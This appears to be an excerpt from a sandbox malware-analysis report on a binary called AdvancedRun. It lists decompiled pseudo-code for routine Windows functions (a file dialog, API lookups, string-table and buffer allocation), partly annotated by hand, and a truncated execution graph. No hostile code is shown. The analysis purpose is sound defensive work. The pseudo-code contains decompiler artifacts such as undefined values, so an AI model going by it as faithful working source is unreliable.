                                                                  			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                  				intOrPtr _v20;
                                                                  				intOrPtr _v28;
                                                                  				intOrPtr _v32;
                                                                  				intOrPtr _v36;
                                                                  				intOrPtr _v44;
                                                                  				intOrPtr _v48;
                                                                  				wchar_t* _v52;
                                                                  				intOrPtr _v56;
                                                                  				intOrPtr _v64;
                                                                  				intOrPtr _v68;
                                                                  				intOrPtr _v76;
                                                                  				struct tagOFNA _v80;
                                                                  
                                                                  				_v76 = __eax;
                                                                  				_v68 = _a4;
                                                                  				_v64 = 0;
                                                                  				_v44 = 0;
                                                                  				_v36 = 0;
                                                                  				_v32 = _a8;
                                                                  				_v20 = _a12;
                                                                  				_v80 = 0x4c;
                                                                  				_v56 = 1;
                                                                  				_v52 = __esi;
                                                                  				_v48 = 0x104;
                                                                  				_v28 = 0x81804;
                                                                  				if(GetOpenFileNameW( &_v80) == 0) {
                                                                  					return 0;
                                                                  				} else {
                                                                  					wcscpy(__esi, _v52);
                                                                  					return 1;
                                                                  				}
                                                                  			}

                                                                  Instruction addresses: 0x00405080 0x00405086 0x0040508b 0x0040508e 0x00405091 0x00405097 0x0040509d 0x004050a4 0x004050ab 0x004050b2 0x004050b5 0x004050bc 0x004050cb 0x004050e0 0x004050cd 0x004050d1 0x004050dc 0x004050dc

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileNameOpenwcscpy
                                                                  • String ID: L
                                                                  • API String ID: 3246554996-2909332022
                                                                  • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                  • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                  • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                  • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 58%
                                                                  			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                  				void* __esi;
                                                                  				_Unknown_base(*)()* _t10;
                                                                  				void* _t12;
                                                                  				struct HINSTANCE__** _t13;
                                                                  
                                                                  				_t13 = __eax;
                                                                  				_t12 = 0;
                                                                  				if(E00408F72(__eax) != 0) {
                                                                  					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
                                                                  					if(_t10 != 0) {
                                                                  						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
                                                                  					}
                                                                  				}
                                                                  				return _t12;
                                                                  			}

                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: LookupAccountSidW$Y@
                                                                  • API String ID: 190572456-2352570548
                                                                  • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                  • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                  • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                  • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 37%
                                                                  			E0040AD85(intOrPtr _a4) {
                                                                  				_Unknown_base(*)()* _t3;
                                                                  				void* _t7;
                                                                  				struct HINSTANCE__* _t8;
                                                                  				char** _t9;
                                                                  
                                                                  				_t7 = 0;
                                                                  				_t8 = E00405436(L"shlwapi.dll");
                                                                  				 *_t9 = "SHAutoComplete";
                                                                  				_t3 = GetProcAddress(_t8, ??);
                                                                  				if(_t3 != 0) {
                                                                  					_t7 =  *_t3(_a4, 0x10000001);
                                                                  				}
                                                                  				FreeLibrary(_t8);
                                                                  				return _t7;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                  • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                  • String ID: shlwapi.dll
                                                                  • API String ID: 4092907564-3792422438
                                                                  • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                  • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                  • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                  • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00406597(wchar_t* __esi) {
                                                                  				wchar_t* _t2;
                                                                  				wchar_t* _t6;
                                                                  
                                                                  				_t6 = __esi;
                                                                  				E00404AD9(__esi);
                                                                  				_t2 = wcsrchr(__esi, 0x2e);
                                                                  				if(_t2 != 0) {
                                                                  					 *_t2 =  *_t2 & 0x00000000;
                                                                  				}
                                                                  				return wcscat(_t6, L"_lng.ini");
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • wcsrchr.MSVCRT ref: 004065A0
                                                                  • wcscat.MSVCRT ref: 004065B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                                  • String ID: _lng.ini
                                                                  • API String ID: 383090722-1948609170
                                                                  • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                  • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                  • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                  • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0040AC52() {
                                                                  				struct HINSTANCE__* _t1;
                                                                  				_Unknown_base(*)()* _t2;
                                                                  
                                                                  				if( *0x4101c4 == 0) {
                                                                  					_t1 = E00405436(L"shell32.dll");
                                                                  					 *0x4101c4 = _t1;
                                                                  					if(_t1 != 0) {
                                                                  						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                  						 *0x4101c0 = _t2;
                                                                  						return _t2;
                                                                  					}
                                                                  				}
                                                                  				return _t1;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                  • API String ID: 946536540-880857682
                                                                  • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                  • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                  • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                  • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 90%
                                                                  			E00406670(char** __esi, void* __eflags) {
                                                                  				char* _t30;
                                                                  				char** _t39;
                                                                  
                                                                  				_t39 = __esi;
                                                                  				 *__esi = "cf@";
                                                                  				__esi[0xb8] = 0;
                                                                  				_t30 = E00404FA4(0x338, __esi);
                                                                  				_push(0x14);
                                                                  				__esi[0xcb] = 0;
                                                                  				__esi[0xa6] = 0;
                                                                  				__esi[0xb9] = 0;
                                                                  				__esi[0xba] = 0xfff;
                                                                  				__esi[8] = 0;
                                                                  				__esi[1] = 0;
                                                                  				__esi[0xb7] = 1;
                                                                  				L0040B26C();
                                                                  				if(_t30 == 0) {
                                                                  					_t30 = 0;
                                                                  				} else {
                                                                  					_t30[4] = 0;
                                                                  					_t30[0x10] = 0;
                                                                  					_t30[8] = 0;
                                                                  					_t30[0xc] = 0x100;
                                                                  					 *_t30 = 0;
                                                                  				}
                                                                  				_push(0x14);
                                                                  				_t39[2] = _t30;
                                                                  				L0040B26C();
                                                                  				if(_t30 == 0) {
                                                                  					_t30 = 0;
                                                                  				} else {
                                                                  					_t30[4] = 0;
                                                                  					_t30[0x10] = 0;
                                                                  					_t30[8] = 0;
                                                                  					_t30[0xc] = 0x100;
                                                                  					 *_t30 = 0;
                                                                  				}
                                                                  				_push(0x14);
                                                                  				_t39[3] = _t30;
                                                                  				L0040B26C();
                                                                  				if(_t30 == 0) {
                                                                  					_t30 = 0;
                                                                  				} else {
                                                                  					_t30[4] = 0;
                                                                  					_t30[0x10] = 0;
                                                                  					_t30[8] = 0;
                                                                  					_t30[0xc] = 0x100;
                                                                  					 *_t30 = 0;
                                                                  				}
                                                                  				_push(0x14);
                                                                  				_t39[4] = _t30;
                                                                  				L0040B26C();
                                                                  				if(_t30 == 0) {
                                                                  					_t30 = 0;
                                                                  				} else {
                                                                  					_t30[4] = 0;
                                                                  					_t30[0x10] = 0;
                                                                  					_t30[8] = 0;
                                                                  					_t30[0xc] = 0x100;
                                                                  					 *_t30 = 0;
                                                                  				}
                                                                  				_t39[5] = _t30;
                                                                  				return _t39;
                                                                  			}

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$memset
                                                                  • String ID:
                                                                  • API String ID: 1860491036-0
                                                                  • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                  • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                  • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                  • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                  				// Appends the wide string _a4 to a growable string table held in __eax:
                                                                  				//   +0x04 character count, +0x10 wchar_t buffer, +0x14 buffer capacity,
                                                                  				//   +0x0c int offset array, +0x18 offset capacity, +0x1c entry count.
                                                                  				// Returns the index of the new entry.
                                                                  				int _v8;
                                                                  				signed int _v12;
                                                                  				void* __edi;
                                                                  				int _t32;
                                                                  				intOrPtr _t33;
                                                                  				intOrPtr _t36;
                                                                  				signed int _t48;
                                                                  				signed int _t58;
                                                                  				signed int _t59;
                                                                  				signed int _t60; // declaration added; the decompiler output omitted it
                                                                  				signed int _t30; // declaration added; the decompiler output omitted it
                                                                  				void** _t62;
                                                                  				void** _t63;
                                                                  				signed int* _t66;
                                                                  
                                                                  				_t66 = __eax;
                                                                  				_t32 = wcslen(_a4);
                                                                  				_t48 =  *(_t66 + 4);           // current character count = offset of the new entry
                                                                  				_t58 = _t48 + _t32;
                                                                  				_v12 = _t58;                   // index of the terminating null
                                                                  				_t59 = _t58 + 1;               // new character count including the null
                                                                  				_v8 = _t32;
                                                                  				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                  				 *(_t66 + 4) = _t59;
                                                                  				_t62 = _t66 + 0x10;
                                                                  				// E00404951 grows a buffer (malloc/memcpy/free, see subcall list); element size 2 for wchar_t.
                                                                  				// A count of 0xffffffff (overflow) frees the buffer instead of growing it.
                                                                  				if(_t59 != 0xffffffff) {
                                                                  					E00404951(_t66, _t59, _t62, 2, _t33);
                                                                  				} else {
                                                                  					free( *_t62);
                                                                  				}
                                                                  				_t60 =  *(_t66 + 0x1c);        // current entry count
                                                                  				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                  				_t63 = _t66 + 0xc;
                                                                  				// Same growth step for the offset array (element size 4).
                                                                  				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                  					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
                                                                  				} else {
                                                                  					free( *_t63);
                                                                  				}
                                                                  				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);   // copy the string after the existing text
                                                                  				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;   // null-terminate
                                                                  				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;   // record the offset of the new entry
                                                                  				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                  				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                  				return _t30;
                                                                  			}
                                                                  
                                                                  Instruction addresses (instruction text not present in the extracted report): 0x004054ea, 0x004054ec, 0x004054f1, 0x004054f4, 0x004054f7, 0x004054fa, 0x004054fe, 0x00405501, 0x00405505, 0x00405508, 0x0040550b, 0x0040551b, 0x0040550d, 0x0040550f, 0x0040550f, 0x00405521, 0x00405527, 0x0040552b, 0x0040552e, 0x0040553f, 0x00405530, 0x00405532, 0x00405532, 0x00405556, 0x00405561, 0x0040556e, 0x00405571, 0x00405578, 0x0040557e

                                                                  APIs
                                                                  • wcslen.MSVCRT ref: 004054EC
                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                    • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                    • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                    • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                  • memcpy.MSVCRT ref: 00405556
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: free$memcpy$mallocwcslen
                                                                  • String ID:
                                                                  • API String ID: 726966127-0
                                                                  • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                  • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                  • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                  • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 81%
                                                                  			E00405ADF() {
                                                                  				// One-time allocation of four global buffers, guarded by *0x41c470 == 0.
                                                                  				// L0040B26C is the CRT operator new (API ID ??2@). The _push() operand is the
                                                                  				// byte count; the ~(0 | _t60 > 0) | _tNN form is the decompiler's rendering of
                                                                  				// the compiler's size-overflow check, which saturates the size to 0xffffffff.
                                                                  				void* _t25;
                                                                  				signed int _t27;
                                                                  				signed int _t29;
                                                                  				signed int _t31;
                                                                  				signed int _t33;
                                                                  				signed int _t50;
                                                                  				signed int _t52;
                                                                  				signed int _t54;
                                                                  				signed int _t56;
                                                                  				intOrPtr _t60;
                                                                  
                                                                  				_t60 =  *0x41c470;
                                                                  				if(_t60 == 0) {
                                                                  					_t50 = 2;
                                                                  					 *0x41c470 = 0x8000;          // element count of the first buffer
                                                                  					_t27 = 0x8000 * _t50;         // 0x8000 elements of 2 bytes
                                                                  					 *0x41c474 = 0x100;
                                                                  					 *0x41c478 = 0x1000;
                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t27);
                                                                  					L0040B26C();
                                                                  					 *0x41c458 = _t27;            // first buffer
                                                                  					_t52 = 4;
                                                                  					_t29 =  *0x41c474 * _t52;     // 0x100 elements of 4 bytes
                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                  					L0040B26C();
                                                                  					 *0x41c460 = _t29;            // second buffer
                                                                  					_t54 = 4;
                                                                  					_t31 =  *0x41c474 * _t54;     // 0x100 elements of 4 bytes
                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                  					L0040B26C();
                                                                  					 *0x41c464 = _t31;            // third buffer
                                                                  					_t56 = 2;
                                                                  					_t33 =  *0x41c478 * _t56;     // 0x1000 elements of 2 bytes
                                                                  					_push( ~(0 | _t60 > 0x00000000) | _t33);
                                                                  					L0040B26C();
                                                                  					 *0x41c45c = _t33;            // fourth buffer
                                                                  					return _t33;
                                                                  				}
                                                                  				return _t25;   // _t25 is never assigned: the return value when the buffers already exist is undefined (decompiler artifact)
                                                                  			}
                                                                  
                                                                  Instruction addresses (instruction text not present in the extracted report): 0x00405adf, 0x00405ae6, 0x00405af5, 0x00405af6, 0x00405afb, 0x00405b00, 0x00405b0a, 0x00405b18, 0x00405b19, 0x00405b1e, 0x00405b2c, 0x00405b2d, 0x00405b36, 0x00405b37, 0x00405b3c, 0x00405b4a, 0x00405b4b, 0x00405b54, 0x00405b55, 0x00405b5a, 0x00405b68, 0x00405b69, 0x00405b72, 0x00405b73, 0x00405b7b, 0x00000000, 0x00405b7b, 0x00405b80

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@
                                                                  • String ID:
                                                                  • API String ID: 1033339047-0
                                                                  • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                  • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                  • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                  • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:9.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:1983
                                                                  Total number of Limit Nodes:24

                                                                  Graph

                                                                  execution_graph 3613 40a3c1 EnumResourceNamesW 4521 407ec3 4522 407ed9 4521->4522 4523 407eca 4521->4523 4526 405b81 4523->4526 4527 405b8a 4526->4527 4529 405b8f 4526->4529 4543 405adf 4527->4543 4530 405bee 4529->4530 4531 405bbf GetModuleHandleW 4529->4531 4538 405cdb 4529->4538 4533 405c45 4530->4533 4534 405bf8 wcscpy 4530->4534 4532 405c58 LoadStringW 4531->4532 4541 405c63 4532->4541 4549 405ce7 4533->4549 4546 405edd memset _itow 4534->4546 4539 405c1a wcslen 4540 405c2c GetModuleHandleW 4539->4540 4539->4541 4540->4532 4541->4538 4542 405c84 memcpy 4541->4542 4542->4538 4544 405b80 4543->4544 4545 405aec ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 4543->4545 4544->4529 4545->4544 4552 405f39 4546->4552 4548 405c13 4548->4539 4548->4540 4550 405cf0 GetModuleHandleW 4549->4550 4551 405cf7 4549->4551 4550->4551 4551->4532 4553 40b550 4552->4553 4554 405f46 memset GetPrivateProfileStringW 4553->4554 4555 405f92 wcscpy 4554->4555 4556 405fa8 4554->4556 4555->4548 4556->4548 4557 40b644 4560 40b23c 4557->4560 4561 40b216 2 API calls 4560->4561 4562 40b245 4561->4562 3614 40b2c6 3633 40b4d4 3614->3633 3616 40b2d2 GetModuleHandleA 3617 40b2e2 __set_app_type __p__fmode __p__commode 3616->3617 3619 40b376 3617->3619 3620 40b38a 3619->3620 3621 40b37e __setusermatherr 3619->3621 3634 40b4c2 _controlfp 3620->3634 3621->3620 3623 40b38f _initterm __wgetmainargs _initterm 3624 40b3f0 GetStartupInfoW 3623->3624 3625 40b3e2 3623->3625 3627 40b438 GetModuleHandleA 3624->3627 3635 408533 3627->3635 3631 40b468 exit 3632 40b46f _cexit 3631->3632 3632->3625 3633->3616 3634->3623 3636 408543 3635->3636 3692 40313d LoadLibraryW 3636->3692 3638 40854b 3639 40854f 3638->3639 3701 40ac52 3638->3701 3639->3631 3639->3632 3642 408592 3707 4056b5 3642->3707 3648 40585c _wcsicmp 3658 40864f 3648->3658 3649 4085cd 3650 40861f swscanf 3649->3650 3649->3658 3730 40584c 3650->3730 3651 408727 3652 40585c _wcsicmp 3651->3652 
3654 408735 3652->3654 3656 408823 3654->3656 3663 40875c ExpandEnvironmentStringsW wcschr 3654->3663 3660 402f31 36 API calls 3656->3660 3658->3648 3658->3651 3681 4054b9 free free 3658->3681 3758 4035fb 3658->3758 3761 4099d4 3658->3761 3764 402fc6 3658->3764 3773 402f31 memset 3658->3773 3783 40177c 3658->3783 3796 401d40 3658->3796 3662 408829 3660->3662 3665 40177c 20 API calls 3662->3665 3663->3656 3666 40877f memset memset GetCurrentDirectoryW wcslen wcslen 3663->3666 3668 408855 3665->3668 3669 4087fd wcscpy 3666->3669 3670 4087e8 3666->3670 3673 408895 3668->3673 3675 401d40 220 API calls 3668->3675 3669->3656 3804 404be4 wcscpy 3670->3804 3676 40585c _wcsicmp 3673->3676 3675->3673 3678 4088b1 3676->3678 3679 4088b5 3678->3679 3680 4088bf 3678->3680 3807 4065be memset 3679->3807 3812 406420 memset 3680->3812 3681->3658 3688 408910 6 API calls 3689 4088fd 3688->3689 3690 402f31 36 API calls 3689->3690 3691 408904 CoUninitialize 3690->3691 3693 403190 #17 3692->3693 3694 403168 GetProcAddress 3692->3694 3697 403199 3693->3697 3695 403181 FreeLibrary 3694->3695 3696 403178 3694->3696 3695->3693 3698 40318c 3695->3698 3696->3695 3699 4031a0 MessageBoxW 3697->3699 3700 4031b7 3697->3700 3698->3697 3699->3638 3700->3638 3702 40855e SetErrorMode GetModuleHandleW EnumResourceTypesW 3701->3702 3703 40ac5b 3701->3703 3702->3642 3821 405436 memset 3703->3821 3706 40ac6f GetProcAddress 3706->3702 3835 4054b9 free free 3707->3835 3709 405830 3836 4055d1 3709->3836 3712 405807 3712->3709 3857 40559a 3712->3857 3713 40559a malloc memcpy free free 3720 4056f7 3713->3720 3716 4057a3 free 3716->3720 3719 4054df 7 API calls 3719->3709 3720->3709 3720->3712 3720->3713 3720->3716 3839 4054df wcslen 3720->3839 3849 404951 3720->3849 3721 408f48 3862 408fc9 GetCurrentProcess 3721->3862 3724 408f64 FreeLibrary 3725 4085bd 3724->3725 3726 40585c 3725->3726 3727 405883 3726->3727 3728 405864 3726->3728 3727->3649 3728->3727 3729 40586d _wcsicmp 3728->3729 3729->3727 3729->3728 3731 
